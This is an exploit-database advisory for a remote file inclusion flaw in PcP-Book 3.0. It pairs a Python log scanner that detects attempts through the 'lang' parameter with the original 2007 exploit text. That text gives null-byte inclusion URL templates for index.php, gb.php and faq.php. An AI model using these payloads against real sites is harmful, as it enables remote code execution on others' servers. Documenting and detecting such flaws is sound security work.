Vendor: PcP-Book
By: Dj7xpl
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: PcP-Book
Affected Version From: PcP-Book 3.0
Affected Version To: PcP-Book 3.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PcP-Book 3.0 Remote File Inclusion Vulnerability

The PcP-Book 3.0 portal is vulnerable to remote file inclusion. The 'lang' parameter of index.php, gb.php and faq.php is used to select a file to require, so an attacker can point it at a malicious file and execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PcP-Book or apply the necessary security patches.
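
Since no patch is listed, a log check for the request pattern in this advisory is useful. The following is an added example, not part of the advisory or of PcP-Book: it flags 'lang' values on index.php, gb.php and faq.php that contain a decoded null byte, a URL scheme, or anything other than a short language name. The allowed-value pattern, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists as taking the 'lang' parameter.
AFFECTED = {"index.php", "gb.php", "faq.php"}
# Assumption: legitimate values are short language names such as "de" or "english".
SAFE_LANG = re.compile(r"[A-Za-z_-]{2,16}")
# Request part of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def check_line(line):
    """Return a sorted list of reasons the line looks like an inclusion attempt."""
    m = REQUEST.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if target.path.rsplit("/", 1)[-1].lower() not in AFFECTED:
        return []
    reasons = []
    # parse_qs percent-decodes, so %00 arrives here as a real NUL character.
    for value in parse_qs(target.query, keep_blank_values=True).get("lang", []):
        if "\x00" in value:
            reasons.append("null-byte")
        if "://" in value:
            reasons.append("url-scheme")
        if not SAFE_LANG.fullmatch(value):
            reasons.append("not-a-language-name")
    return sorted(set(reasons))


# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2007:10:00:01 +0000] "GET /book/index.php?lang=de HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Apr/2007:10:00:07 +0000] "GET /book/gb.php?lang=http://host.invalid/f.txt%00 HTTP/1.1" 200 312',
    '192.0.2.44 - - [08/Apr/2007:10:00:09 +0000] "GET /book/faq.php?lang=english%00 HTTP/1.1" 200 298',
    '192.0.2.10 - - [08/Apr/2007:10:00:12 +0000] "GET /book/other.php?lang=http://host.invalid/ HTTP/1.1" 404 0',
]


def scan(lines):
    """Map line index -> reasons for every flagged line."""
    return {i: r for i, line in enumerate(lines) if (r := check_line(line))}


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_LOG).items():
        print(idx, why, SAMPLE_LOG[idx])
```

A flagged request that returned 200 deserves a closer look than one that returned an error, since the status shows the script ran with that value.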
Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:    http://www.ectona.org/download/?id=621&s=info
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*                             
*		
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-08]